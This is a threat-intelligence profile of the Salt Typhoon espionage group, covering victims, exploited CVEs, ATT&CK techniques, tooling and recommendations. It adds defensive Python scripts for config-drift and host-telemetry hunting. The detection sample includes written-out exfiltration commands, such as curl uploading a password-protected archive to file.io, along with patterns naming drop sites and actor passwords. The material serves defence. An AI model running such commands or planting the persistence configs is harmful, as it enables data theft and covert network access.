
Salt Typhoon

Aliases: GhostEmperor · Earth Estries · FamousSparrow · UNC2286 · RedMike · Operator Panda

🔴 Active Campaign
State-sponsored · Capability: High · Attributed to PRC Ministry of State Security / China · Rating: B2
Cut-off: April 12, 2026 · TLP:AMBER

Diamond Model (vertex source ratings, in the order listed: B2 · B2 · A1 · B2)

Adversary: PRC MSS · Active since 2019

Infrastructure: Compromised Cisco devices · GRE tunnels · ORB relays

Victim: Gov · Telecom · ISP · University

Capability: Custom + rootkit + LOLBins · Zero-day exploitation

Telecom Espionage

Motive & Objectives

Espionage · SIGINT collection · Lawful intercept access · Political surveillance · IP theft · Pre-positioning

Sector Proximity

  • Global telecommunications: Primary and defining target set

  • Government / think tanks: Congressional targets breached Dec 2025

  • Defense technology / high-tech startups: DIB is secondary target set

  • Higher education / research institutions: 13 universities targeted for telecom research

  • Venture capital / investment: Portfolio exposure via telecom/defense holdings

Capability Assessment

  • Tooling: High
  • Persistence: High
  • Attribution evasion: Moderate
  • Zero-days: High

Malware Lineage

GhostSpider · Demodex (rootkit) · JumbledPath (S1206) · SnappyBee · HemiGate · Crowdoor · Zingdoor · Cobalt Strike · Mimikatz · SparrowDoor

Victimology

  • Telecommunications providers · AT&T, Verizon, T-Mobile, Lumen, 200+ orgs globally

  • Government & defense ministries · US congressional committees breached Dec 2025

  • Internet service providers · Consolidated Communications, Windstream, Spectrum

  • Universities · 13 institutions across 9 countries

  • Defense industrial base · Secondary targeting via telecom access

Geographic Focus

United States (primary) · Southeast Asia · Europe · Middle East · 80+ countries

Full Analysis

Executive Summary

Intelligence Cut-off Date: 12-Apr-2026

Salt Typhoon is a PRC state-sponsored cyber espionage group that has compromised more than 200 organizations across 80 countries since at least 2019, with a primary focus on telecommunications providers and internet service providers. The group achieved strategic access to US lawful intercept systems at major carriers including AT&T, Verizon, and T-Mobile, enabling surveillance of US political figures and senior government officials. As of early 2026, FBI officials assess the threat posed by Salt Typhoon remains “very much ongoing,” with intrusions detected in US congressional committees as recently as December 2025. [Source: CyberScoop FBI reporting, Rating: B2]

Overall Assessment: [Confidence: HIGH] — Multi-source confirmation across US government agencies, major cybersecurity vendors, and OFAC sanctions documentation.

Identity and Attribution

Salt Typhoon is tracked under multiple designations across the threat intelligence community: Earth Estries (Trend Micro), GhostEmperor (Kaspersky), FamousSparrow (ESET), UNC2286 (Mandiant/Google), RedMike (Recorded Future Insikt Group), and Operator Panda (CrowdStrike). MITRE ATT&CK catalogues the group as G1045. The Microsoft designation “Salt Typhoon” has become the most widely used identifier in public reporting and US government communications. [Source: MITRE ATT&CK G1045, Rating: A1]

Attribution points to the People’s Republic of China’s Ministry of State Security (MSS). On January 17, 2025, the US Treasury Department’s Office of Foreign Assets Control (OFAC) sanctioned Sichuan Juxinhe Network Technology Co., Ltd. for “direct involvement in exploiting US telecommunications,” providing the most specific organizational attribution to date. [Source: US Treasury OFAC Designation, Rating: A1] The relationship between Sichuan Juxinhe and broader MSS tasking remains assessed rather than confirmed, though the sanctions language implies an operational — not merely contractual — role. [Confidence: HIGH on MSS sponsorship; MODERATE on specific organizational structure]

The group has been active since at least 2019, though some researchers assess earlier precursor activity may date to 2017 under the GhostEmperor designation. [Source: Kaspersky GhostEmperor report, Rating: B2] There is no confirmed evidence of formal organizational mergers with other tracked PRC groups, though infrastructure and tooling overlaps have been noted with other MSS-linked clusters.

Motive and Objective

Salt Typhoon’s primary motive is strategic intelligence collection in service of PRC national security objectives. This is not opportunistic cybercrime — the targeting pattern reflects deliberate, state-directed priorities.

Specific objectives include: monitoring confidential telecommunications to collect signals intelligence on foreign government officials and political figures; accessing lawful intercept programs maintained by US carriers, which would provide visibility into active US law enforcement and intelligence investigations; and acquiring research data and intellectual property from universities with telecommunications, engineering, and technology programs. [Source: CISA/FBI/NSA Joint CSA AA25-239A, Rating: A1]

The targeting of lawful intercept systems represents a particularly high-value objective. Access to these systems would allow PRC intelligence services to determine which of their own operatives and assets are under US surveillance — a counterintelligence capability of significant strategic value. [Inference — based on targeting pattern and known PRC intelligence priorities]

Victimology

Salt Typhoon’s victim set is global in scope but concentrated in the telecommunications sector. The FBI confirmed in August 2025 that at least 200 organizations across 80 countries had been compromised. [Source: FBI CyberTalks 2026, Rating: B2]

Named US telecommunications victims include AT&T, Verizon, T-Mobile, Lumen Technologies, Consolidated Communications, Windstream, and Spectrum. [Source: Multiple congressional reporting, Rating: A1] Beyond the US, Recorded Future’s Insikt Group documented compromises of telecommunications providers in South Africa, Italy, Thailand, and a US-based affiliate of a UK provider during the December 2024–January 2025 RedMike campaign. [Source: Recorded Future RedMike analysis, Rating: B2]

Salt Typhoon also targets universities conducting telecommunications and engineering research. Thirteen institutions across nine countries were identified as targets: UCLA, CENIC (the California research and education network rather than a university proper), Loyola Marymount, and Utah Tech (US); Technische Universiteit Delft (Netherlands); University of Malaya (Malaysia); Universidad Nacional Autónoma de México; and institutions in Argentina, Bangladesh, Indonesia, Thailand, and Vietnam. [Source: Recorded Future RedMike analysis, Rating: B2]

In December 2025, intrusions were detected in several US House of Representatives committees, expanding the victim set into the legislative branch of government. [Source: Congressional reporting, Rating: B2]

Sector Proximity Assessment:

  • Global telecommunications: DIRECT — Salt Typhoon’s primary and defining target set. All major telecom operators and ISPs face active targeting risk.
  • Defense technology / high-tech startups: ADJACENT — Defense industrial base is a secondary target set for PRC espionage broadly; Salt Typhoon’s telecom access could enable collection against defense communications.
  • Venture capital / investment: ADJACENT — Portfolio companies in telecom, networking, and defense technology sectors face elevated exposure through supply chain and communications interception.
  • Government / think tanks: DIRECT — US congressional committees breached December 2025; political figure surveillance confirmed; think tanks focused on PRC policy or telecom regulation face collection interest.
  • Higher education / research institutions: ADJACENT — 13 universities targeted specifically for telecom and engineering research programs.

Capability Assessment

Rating: High [Confidence: HIGH]

Salt Typhoon operates at the top tier of capability, consistent with a well-resourced MSS-directed operation. The evidence supporting this assessment spans multiple dimensions.

Custom tooling ecosystem: The group develops and maintains a diverse suite of custom malware, including GhostSpider (a backdoor purpose-built for telecom network persistence), the Demodex kernel-mode rootkit (enabling deep persistence that survives standard remediation), JumbledPath (a custom Go binary for packet capture, infrastructure concealment, and log clearing — catalogued by MITRE as S1206), SnappyBee, HemiGate, Crowdoor, and Zingdoor. This breadth of custom tooling indicates dedicated development resources. [Source: Picus Security / Cisco Talos / MITRE ATT&CK S1206, Rating: B2]

Vulnerability exploitation: Salt Typhoon exploits both zero-day and N-day vulnerabilities in edge network devices and enterprise software. Confirmed exploitation includes CVE-2023-20198 (Cisco IOS XE web UI authentication bypass, used to create a privilege-15 local account) chained with CVE-2023-20273 (IOS XE web UI command injection to root), CVE-2023-46805 and CVE-2024-21887 (Ivanti Connect Secure authentication bypass and command injection), CVE-2023-48788 (Fortinet FortiClient EMS SQL injection), CVE-2022-3236 (Sophos Firewall), and the ProxyLogon chain (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) against Microsoft Exchange. [Source: Picus Security / Recorded Future, Rating: B2]

Operational security: The group demonstrates sophisticated tradecraft including kernel-mode rootkits to evade endpoint detection, living-off-the-land techniques to blend with legitimate administration, GRE tunnel-based C2 channels designed to bypass network monitoring, DLL side-loading through legitimate antivirus processes (Norton, Bkav, IObit), and systematic log clearing. Dwell times have been measured in months to years. [Source: CISA/FBI/NSA Joint CSA, Rating: A1]

State-level resourcing: Confirmed by OFAC sanctions against Sichuan Juxinhe Network Technology (January 2025), establishing direct state backing rather than merely inferred sponsorship. [Source: US Treasury OFAC, Rating: A1]

Modus Operandi

Key Campaigns

RedMike Campaign (Dec 2024–Jan 2025): Attempted exploitation of more than 1,000 Cisco network devices globally (ASR, ISR, and Catalyst series) via CVE-2023-20198 and CVE-2023-20273. Over 50% of targets located in the US, South America, and India, with remaining targets across 100+ countries. Seven confirmed compromised devices observed communicating with RedMike infrastructure. Established GRE tunnels for persistent access and data exfiltration. [Source: Recorded Future Insikt Group, Rating: B2]

US Telecom Compromise (disclosed Oct 2024): Compromised nine major US telecommunications providers including AT&T, Verizon, T-Mobile, and Lumen Technologies. Accessed lawful intercept systems. Intercepted communications of US political figures. Dwell time estimated at months to years prior to disclosure. [Source: CISA/FBI/NSA, Rating: A1]

University Targeting (2024–2025): Targeted 13 universities across 9 countries for research in telecommunications, engineering, and technology. Conducted through the same Cisco exploitation infrastructure used in the RedMike campaign. [Source: Recorded Future, Rating: B2]

Congressional Intrusion (Dec 2025): Intrusions detected in several US House of Representatives committees. Attributed to Salt Typhoon. [Source: Congressional reporting, Rating: B2]

MITRE ATT&CK TTPs

Phase | Technique ID | Technique Name | Notes
Initial Access | T1190 | Exploit Public-Facing Application | Primary vector — Cisco, Ivanti, Fortinet, Sophos, Exchange
Execution | T1059.001 | PowerShell | Encrypted PowerShell scripts for payload delivery
Execution | T1059.003 | Windows Command Shell | Post-compromise command execution
Persistence | T1098.004 | SSH Authorized Keys | On compromised network devices
Persistence | T1136 | Create Account | Local accounts with elevated privileges on routers
Persistence | T1543.003 | Windows Service | Crowdoor backdoor persistence
Persistence | T1112 | Modify Registry | Registry Run key persistence (Run key autostart is catalogued more precisely as T1547.001)
Privilege Escalation | T1068 | Exploitation for Privilege Escalation | CVE-2023-20198 chain
Privilege Escalation | T1078 | Valid Accounts | Harvested credentials for lateral movement
Defense Evasion | T1574.002 | DLL Side-Loading | Via Norton, Bkav, IObit AV processes
Defense Evasion | T1562.004 | Disable or Modify System Firewall | Post-compromise on network devices
Defense Evasion | T1070.002 | Clear Linux or Mac System Logs | Via JumbledPath (S1206)
Defense Evasion | T1027 | Obfuscated Files or Information | Encrypted payloads and packed binaries
Credential Access | T1003.003 | NTDS | NinjaCopy variant for NTDS.dit extraction
Credential Access | T1040 | Network Sniffing | Via JumbledPath packet capture and lawful intercept access
Lateral Movement | T1021.004 | SSH | Loopback interface pivoting between devices
Collection | T1005 | Data from Local System | Compressed into password-protected RAR archives
Collection | T1602.002 | Network Device Configuration Dump | Router config exfiltration
Command and Control | T1572 | Protocol Tunneling | GRE tunnels on compromised Cisco devices
Command and Control | T1090.001 | Internal Proxy | Multi-hop relay chains via ORB networks
Exfiltration | T1048.003 | Exfiltration Over Unencrypted Non-C2 Protocol | Via cURL to anonfiles/file.io
Exfiltration | T1041 | Exfiltration Over C2 Channel | Via GRE tunnel infrastructure

Tools and Malware

Custom malware:

  • GhostSpider — Backdoor purpose-built for persistence in telecommunications network environments.
  • Demodex — Kernel-mode rootkit enabling deep, persistent access that survives standard endpoint remediation.
  • JumbledPath (S1206) — Custom Go binary with capabilities for packet capture, infrastructure concealment, defense impairment, log clearing, and multi-stage channel establishment. MITRE-catalogued.
  • SnappyBee — DLL side-loading payload delivered through legitimate antivirus process injection.
  • HemiGate — Backdoor used in telecommunications targeting campaigns.
  • Crowdoor — Persistence backdoor utilizing Windows service and registry modification for survival.
  • Zingdoor — C2 proxy routing tool enabling multi-hop communication chains.
  • NinjaCopy (modified) — Variant used for NTDS.dit database extraction for credential harvesting.

Commodity and open-source tools:

  • Cobalt Strike (beacons for C2)
  • PsExec (lateral movement)
  • WMIC (remote execution)
  • cURL (data exfiltration to anonymous file-sharing services)

Infrastructure Patterns

Salt Typhoon favors compromised edge devices as operational infrastructure rather than dedicated attacker-controlled servers. Cisco IOS XE devices are the primary platform, with GRE tunnels configured on compromised routers serving as C2 and exfiltration channels. This approach is tactically effective because GRE traffic between network devices is often considered legitimate and may not trigger security monitoring.

The group also uses Operational Relay Box (ORB) networks — chains of compromised devices that relay traffic to obscure the ultimate destination of exfiltrated data. Exfiltration endpoints include anonymous file-sharing services (anonfiles[.]com, file[.]io) accessed via cURL from compromised hosts. Note that anonfiles[.]com announced its shutdown in August 2023, so it should be treated as a historical indicator; the host-side pattern (cURL from a server or workstation to a public file-drop service) is the durable signal.

Shared infrastructure has been observed between Cisco exploitation campaigns and Myanmar reconnaissance activities, suggesting centralized infrastructure management. [Source: Recorded Future, Rating: B2]
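As an added illustration of how the configuration-baseline check behind this section (and the "Hunt for GRE tunnel anomalies" recommendation later in this profile) looks in practice, the Python script below diffs a Cisco IOS XE running-config against a known-good baseline and flags the persistence artefacts this profile attributes to Salt Typhoon: new GRE tunnels (T1572), new privilege-15 local accounts (T1136), new SSH public keys (T1098.004), new loopback interfaces used as tunnel sources (T1021.004), and an enabled HTTP/HTTPS web UI, which is the attack surface for CVE-2023-20198. It is example code written for this page, not tooling from Cisco, Recorded Future or the profile's author. Both configs, the hostname, the account names, the key hash and the addresses are constructed for illustration; the one piece of platform knowledge baked in is that IOS XE defaults a Tunnel interface to `tunnel mode gre ip` and normally omits that line from the running-config, so a tunnel with no explicit mode is treated as GRE.

```python
"""Hunt a Cisco IOS XE running-config for Salt Typhoon-style persistence artefacts.

Added example for this profile, not vendor or operator tooling. The two configs
below are constructed: hostname, account names, key hash and addresses are invented.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed known-good baseline: what the device looked like at the last audit.
BASELINE = """\
hostname edge-rtr-01
ip http secure-server
username netops privilege 15 secret 9 $9$baseline
interface Loopback0
 ip address 10.255.0.1 255.255.255.255
interface GigabitEthernet0/0/0
 ip address 203.0.113.10 255.255.255.0
line vty 0 4
 transport input ssh
"""

# Constructed running-config showing the artefacts described in the profile: a second
# privilege-15 account, an SSH key for it, a new loopback used as the tunnel source,
# a GRE tunnel to an external host, and the plaintext web UI switched on.
RUNNING = """\
hostname edge-rtr-01
ip http server
ip http secure-server
username netops privilege 15 secret 9 $9$baseline
username svc_backup privilege 15 secret 9 $9$invented
ip ssh pubkey-chain
 username svc_backup
  key-hash ssh-rsa 0123456789ABCDEF0123456789ABCDEF
interface Loopback0
 ip address 10.255.0.1 255.255.255.255
interface Loopback99
 ip address 10.9.9.9 255.255.255.255
interface Tunnel1
 ip address 172.16.99.1 255.255.255.252
 tunnel source Loopback99
 tunnel destination 198.51.100.77
interface GigabitEthernet0/0/0
 ip address 203.0.113.10 255.255.255.0
line vty 0 4
 transport input ssh
"""

PRIV_USER = re.compile(r"^username (\S+) .*\bprivilege 15\b")
WEB_UI_LINES = ("ip http server", "ip http secure-server")


@dataclass(frozen=True)
class Finding:
    technique: str  # ATT&CK ID or CVE the check maps to
    severity: str   # HIGH or MEDIUM
    detail: str


def parse_config(text: str) -> list[tuple[str, list[str]]]:
    """Split an IOS-style config into (top-level line, [indented children]) blocks, in order."""
    blocks: list[tuple[str, list[str]]] = []
    for raw in text.splitlines():
        if not raw.strip() or raw.strip() == "!":
            continue
        if raw[0].isspace():
            if blocks:
                blocks[-1][1].append(raw.strip())
        else:
            blocks.append((raw.rstrip(), []))
    return blocks


def gre_tunnels(blocks) -> dict[str, tuple[str, str]]:
    """Return {tunnel_name: (source, destination)} for every GRE tunnel interface.

    A Tunnel interface with no explicit 'tunnel mode' line counts as GRE (the IOS XE default).
    """
    out: dict[str, tuple[str, str]] = {}
    for head, children in blocks:
        if not head.startswith("interface Tunnel"):
            continue
        mode = next((c for c in children if c.startswith("tunnel mode ")), "tunnel mode gre ip")
        if not mode.startswith("tunnel mode gre"):
            continue
        src = next((c.split(None, 2)[2] for c in children if c.startswith("tunnel source ")), "?")
        dst = next((c.split(None, 2)[2] for c in children if c.startswith("tunnel destination ")), "?")
        out[head.split()[1]] = (src, dst)
    return out


def privileged_users(blocks) -> set[str]:
    return {m.group(1) for head, _ in blocks if (m := PRIV_USER.match(head))}


def ssh_pubkey_users(blocks) -> set[str]:
    users: set[str] = set()
    for head, children in blocks:
        if head == "ip ssh pubkey-chain":
            users.update(c.split()[1] for c in children if c.startswith("username "))
    return users


def loopbacks(blocks) -> set[str]:
    return {head.split()[1] for head, _ in blocks if head.startswith("interface Loopback")}


def web_ui_enabled(blocks) -> set[str]:
    return {head for head, _ in blocks if head in WEB_UI_LINES}


def hunt(baseline_text: str, running_text: str) -> list[Finding]:
    """Report artefacts present in the running-config but absent from the baseline."""
    base, run = parse_config(baseline_text), parse_config(running_text)
    findings: list[Finding] = []
    base_tunnels = gre_tunnels(base)
    for name, (src, dst) in gre_tunnels(run).items():
        if name not in base_tunnels:
            findings.append(Finding("T1572", "HIGH", f"new GRE tunnel {name}: {src} -> {dst}"))
    for user in sorted(privileged_users(run) - privileged_users(base)):
        findings.append(Finding("T1136", "HIGH", f"new privilege-15 account {user}"))
    for user in sorted(ssh_pubkey_users(run) - ssh_pubkey_users(base)):
        findings.append(Finding("T1098.004", "HIGH", f"new SSH public key for {user}"))
    for lo in sorted(loopbacks(run) - loopbacks(base)):
        findings.append(Finding("T1021.004", "MEDIUM", f"new interface {lo} (candidate tunnel source)"))
    # The web UI is reported even when baselined: it is the CVE-2023-20198 attack surface.
    for line in sorted(web_ui_enabled(run)):
        sev = "HIGH" if line not in web_ui_enabled(base) else "MEDIUM"
        findings.append(Finding("CVE-2023-20198", sev, f"web UI enabled: '{line}'"))
    return findings


if __name__ == "__main__":
    for f in hunt(BASELINE, RUNNING):
        print(f"[{f.severity}] {f.technique}: {f.detail}")
```

In production the baseline would come from a configuration management store and the running-config from `show running-config` collected out of band; the point of diffing against a baseline rather than pattern-matching alone is that a legitimate GRE tunnel or loopback is indistinguishable from a malicious one by syntax, and only the change relative to an audited state is actionable.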

Activity Timeline

Date | Event | Source | Rating
2026-02 | Sen. Cantwell requests hearing with AT&T/Verizon CEOs on post-breach network security | Congressional record | A1
2026-Q1 | FBI top cyber official states Salt Typhoon threat "still very much ongoing" against US public and private sectors | CyberScoop | B2
2025-12 | Intrusions detected in several US House of Representatives committees; attributed to Salt Typhoon | Congressional reporting | B2
2025-08 | FBI confirms 200+ companies compromised across 80 countries; joint CSA AA25-239A issued with 12 partner nations | CISA/FBI/NSA/partners | A1
2025-02 | Cisco Talos publishes technical analysis; MITRE assigns G1045; JumbledPath (S1206) custom tool disclosed | Cisco Talos / MITRE | B2
2025-01 | OFAC sanctions Sichuan Juxinhe Network Technology Co. for direct involvement in telecom exploitation | US Treasury | A1
2024-12 | RedMike campaign: attempted exploitation of 1,000+ Cisco devices globally via CVE-2023-20198/20273 (seven confirmed compromised); GRE tunnel persistence established | Recorded Future Insikt Group | B2
2024-10 | Public disclosure: Salt Typhoon compromised 9 US telecoms including AT&T, Verizon, T-Mobile, Lumen | CISA/FBI/media reporting | A1
2024-H1 | Active exploitation of Ivanti Connect Secure (CVE-2023-46805, CVE-2024-21887) and Fortinet FortiClient EMS (CVE-2023-48788) | Picus Security | B2
~2019 | Earliest assessed Salt Typhoon activity; MITRE dates initial operations to at least 2019 | MITRE ATT&CK G1045 | C3

Forecast, Implications, and Recommendations

What Next (Forecast)

Salt Typhoon will almost certainly continue targeting telecommunications infrastructure globally, with no indication of operational pause or degradation despite public exposure, sanctions, and a multi-nation advisory. [Confidence: HIGH — based on PRC strategic intelligence priorities, continued FBI assessment of ongoing activity, and historical pattern that PRC groups accelerate rather than retreat after public exposure]

The group is likely to expand exploitation of edge network devices beyond Cisco to include Juniper, Arista, and other enterprise networking equipment as vendors patch Cisco-specific vulnerabilities. [Confidence: MODERATE — based on demonstrated capability to pivot across vendor ecosystems (Cisco, Ivanti, Fortinet, Sophos, Exchange)]

Targeting of 5G infrastructure and cloud-based telecom platforms is a probable evolution as carriers modernize their networks. [Confidence: MODERATE — inferred from PRC strategic interest in next-generation telecommunications and Salt Typhoon’s demonstrated focus on telecom architecture]

So What (Implications)

The telecommunications sector faces the most acute risk. Salt Typhoon’s access to lawful intercept systems means that compromise is not merely a data breach — it is a counterintelligence event that could compromise active law enforcement and intelligence operations. Organizations in this sector should assume they are targets and operate accordingly.

The defense technology sector faces indirect but significant risk. Salt Typhoon’s telecom access enables collection against communications that traverse compromised infrastructure, meaning even organizations not directly breached may have their communications intercepted. Defense contractors communicating over compromised carrier networks are exposed regardless of their own security posture.

Government organizations face direct risk, as demonstrated by the December 2025 congressional intrusions. Policy organizations, regulatory bodies, and think tanks focused on PRC-related topics should treat Salt Typhoon as a direct threat.

Now What (Recommendations)

  1. Patch edge devices immediately — Prioritize CVE-2023-20198/20273 (Cisco IOS XE), CVE-2023-46805/CVE-2024-21887 (Ivanti Connect Secure), CVE-2023-48788 (Fortinet FortiClient EMS). Disable web UI on all Cisco devices where not operationally required.
  2. Hunt for GRE tunnel anomalies — Monitor for unexpected GRE tunnel configurations, new local accounts on network devices, and loopback interface changes. Audit all network device configurations against known-good baselines.
  3. Implement CISA AA25-239A mitigations — Restrict management plane access, enforce MFA on all network device administration, segment management networks from production traffic, enable configuration change alerting.
  4. Monitor for DLL side-loading via AV processes — Alert on unsigned DLLs loaded by Norton, Bkav, and IObit processes (T1574.002). Baseline legitimate AV behavior and flag deviations.
  5. Audit credential stores — Hunt for unauthorized NTDS.dit access and SYSTEM hive extraction (T1003.003). Monitor for password-protected archive creation (known passwords: takehaya, foreverthegod, dh2uiwqji9dash).
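The following Python module is an added example, written for this page rather than taken from the profile's author or any vendor, of how recommendations 4 and 5 and the cURL exfiltration technique listed under T1048.003 translate into detection logic. It evaluates Sysmon-shaped image-load (Event ID 7) and process-creation (Event ID 1) records and raises three alerts: an unsigned DLL, or one loaded from a user-writable directory, by a process whose path carries a Norton, Bkav or IObit name; a RAR or 7-Zip archive created with a password, escalated when the password is one of the three listed in this profile; and curl.exe contacting anonfiles.com or file.io. The sample events are constructed. Matching the AV vendor by name in the process path and the user-writable-path list are assumptions of this example, not indicators from the source reports; a production rule would key on the actual product binaries and their signing certificates.

```python
"""Detection logic for three Salt Typhoon host behaviours described in this profile.

Added example, not vendor or operator detection content. Events are constructed
dicts shaped like Sysmon Event ID 7 (ImageLoad) and Event ID 1 (ProcessCreate);
only the fields the checks use are populated.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from pathlib import PureWindowsPath

# From the profile (T1574.002): AV vendors whose processes were abused for side-loading.
# Matching the vendor name inside the process path is a heuristic of this example.
AV_VENDOR_TOKENS = ("norton", "bkav", "iobit")
# From the profile (T1005): archive passwords observed in Salt Typhoon intrusions.
KNOWN_ARCHIVE_PASSWORDS = {"takehaya", "foreverthegod", "dh2uiwqji9dash"}
# From the profile (T1048.003): file-drop services reached with cURL.
DROP_SITE = re.compile(r"(?i)(?<![\w.-])(anonfiles\.com|file\.io)(?![\w-])")
# Added heuristic: directory fragments a non-admin user can normally write to.
USER_WRITABLE = ("\\users\\", "\\programdata\\", "\\temp\\")
# rar/7z password switches: -p<pw> encrypts data, -hp<pw> also encrypts headers.
ARCHIVE_PASSWORD = re.compile(r"(?:^|\s)-(?:hp|p)(\S+)")
ARCHIVER_NAMES = {"rar.exe", "winrar.exe", "7z.exe"}


@dataclass(frozen=True)
class Alert:
    technique: str
    severity: str
    detail: str


def check_image_load(ev: dict) -> Alert | None:
    """Event ID 7: flag DLLs an AV-branded process should not be loading."""
    proc = ev["Image"]
    if not any(tok in proc.lower() for tok in AV_VENDOR_TOKENS):
        return None
    dll = ev["ImageLoaded"]
    unsigned = ev.get("Signed", "false").lower() != "true"
    writable = any(part in dll.lower() for part in USER_WRITABLE)
    if not (unsigned or writable):
        return None
    reason = "unsigned" if unsigned else "loaded from user-writable path"
    return Alert("T1574.002", "HIGH", f"{PureWindowsPath(proc).name} loaded {dll} ({reason})")


def check_process_create(ev: dict) -> list[Alert]:
    """Event ID 1: password-protected archive creation and cURL to a drop site."""
    alerts: list[Alert] = []
    cmd = ev["CommandLine"]
    # OriginalFileName comes from the PE version resource, so it survives a renamed binary.
    original = ev.get("OriginalFileName", "").lower()
    image = PureWindowsPath(ev["Image"]).name.lower()

    if original in ARCHIVER_NAMES or image in ARCHIVER_NAMES or ".rar" in cmd.lower():
        if m := ARCHIVE_PASSWORD.search(cmd):
            pw = m.group(1)
            if pw in KNOWN_ARCHIVE_PASSWORDS:
                alerts.append(Alert("T1005", "HIGH", f"archive created with known Salt Typhoon password '{pw}'"))
            else:
                alerts.append(Alert("T1005", "MEDIUM", "password-protected archive created"))

    if original == "curl.exe" or image == "curl.exe":
        if m := DROP_SITE.search(cmd):
            alerts.append(Alert("T1048.003", "HIGH", f"curl.exe contacted {m.group(1)}"))
    return alerts


def run(events: list[dict]) -> list[Alert]:
    """Evaluate events in order and return every alert raised."""
    alerts: list[Alert] = []
    for ev in events:
        if ev["EventID"] == 7:
            if a := check_image_load(ev):
                alerts.append(a)
        elif ev["EventID"] == 1:
            alerts.extend(check_process_create(ev))
    return alerts


# Constructed sample telemetry: paths, names and command lines are invented for illustration.
SAMPLE_EVENTS = [
    {"EventID": 7, "Image": r"C:\Users\Public\Libraries\NortonHelper.exe",
     "ImageLoaded": r"C:\Users\Public\Libraries\version.dll", "Signed": "false"},
    {"EventID": 7, "Image": r"C:\Users\Public\Libraries\NortonHelper.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll", "Signed": "true"},
    {"EventID": 7, "Image": r"C:\Windows\System32\svchost.exe",   # not an AV process: out of scope here
     "ImageLoaded": r"C:\Users\Public\x.dll", "Signed": "false"},
    {"EventID": 1, "Image": r"C:\Windows\Temp\r.exe", "OriginalFileName": "Rar.exe",   # renamed rar.exe
     "CommandLine": r'"C:\Windows\Temp\r.exe" a -r -hpforeverthegod C:\Windows\Temp\1.rar C:\Users\alice\Documents'},
    {"EventID": 1, "Image": r"C:\Windows\System32\curl.exe", "OriginalFileName": "curl.exe",
     "CommandLine": r'curl.exe -F "file=@C:\Windows\Temp\1.rar" https://file.io'},
    {"EventID": 1, "Image": r"C:\Windows\System32\curl.exe", "OriginalFileName": "curl.exe",
     "CommandLine": "curl.exe https://updates.example.com/manifest.json"},
]

if __name__ == "__main__":
    for a in run(SAMPLE_EVENTS):
        print(f"[{a.severity}] {a.technique}: {a.detail}")
```

Two design points carry over to real deployments: keying the archiver check on `OriginalFileName` (and on a `.rar` target in the command line) catches the renamed `r.exe` that an image-name match would miss, and alerting on any password-protected archive at MEDIUM while reserving HIGH for the three known passwords keeps the rule useful after the operator rotates passwords.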

Technical Evidence

Type | Value | First Seen | Last Seen | Confidence
CVE | CVE-2023-20198 | 2023-10 | 2025-01 | HIGH
CVE | CVE-2023-20273 | 2023-10 | 2025-01 | HIGH
CVE | CVE-2023-46805 | 2024-01 | 2024-H1 | HIGH
CVE | CVE-2024-21887 | 2024-01 | 2024-H1 | HIGH
CVE | CVE-2023-48788 | 2024-H1 | 2024-H1 | MODERATE
CVE | CVE-2021-26855 | 2021-03 | 2024 | HIGH
Domain | anonfiles[.]com | 2024 | 2025 | MODERATE
Domain | file[.]io | 2024 | 2025 | MODERATE
Tool | JumbledPath (S1206) | 2024 | 2025-02 | HIGH
Malware | GhostSpider | 2024 | 2025 | HIGH
Malware | Demodex rootkit | 2021 | 2025 | HIGH
Malware | SnappyBee | 2024 | 2025 | HIGH
Malware | HemiGate | 2024 | 2025 | MODERATE
Malware | Crowdoor | 2024 | 2025 | MODERATE
Technique | GRE tunnels on Cisco devices | 2024-12 | 2025-01 | HIGH
Password | takehaya | 2024 | 2025 | MODERATE
Password | foreverthegod | 2024 | 2025 | MODERATE

[Data Gap: Specific IP addresses and domain IOCs associated with Salt Typhoon C2 infrastructure have not been publicly disclosed in sufficient detail for inclusion. The CISA advisory AA25-239A and Recorded Future RedMike report reference infrastructure indicators but do not publish them in full. Organizations with access to the classified annex or TLP:AMBER versions of these reports should consult those sources directly.]

References

  1. CISA/FBI/NSA Joint Cybersecurity Advisory AA25-239A (Aug 27, 2025). https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-239a. Rating: A1
  2. MITRE ATT&CK — Salt Typhoon (G1045). https://attack.mitre.org/groups/G1045/. Rating: A1
  3. US Treasury OFAC — Sanctions on Sichuan Juxinhe Network Technology Co. (Jan 17, 2025). No public link (press release). Rating: A1
  4. Recorded Future Insikt Group — RedMike (Salt Typhoon) Exploits Vulnerable Cisco Devices (Feb 2025). https://www.recordedfuture.com/research/redmike-salt-typhoon-exploits-vulnerable-devices. Rating: B2
  5. Cisco Talos — Salt Typhoon Technical Analysis (Feb 20, 2025). Referenced in MITRE G1045. Rating: B2
  6. Picus Security — Salt Typhoon: A Persistent Threat to Global Telecommunications Infrastructure. https://www.picussecurity.com/resource/blog/salt-typhoon-telecommunications-threat. Rating: C2
  7. CyberScoop — FBI: Threats from Salt Typhoon are ‘still very much ongoing’ (2026). https://cyberscoop.com/fbi-salt-typhoon-ongoing-threat-cybertalks-2026/. Rating: B2
  8. Wikipedia — Salt Typhoon. https://en.wikipedia.org/wiki/Salt_Typhoon. Rating: C3

Source: PDB Threat Actor Registry · Profile v2

Brandon writes the profiles personally. See /work for the operator background →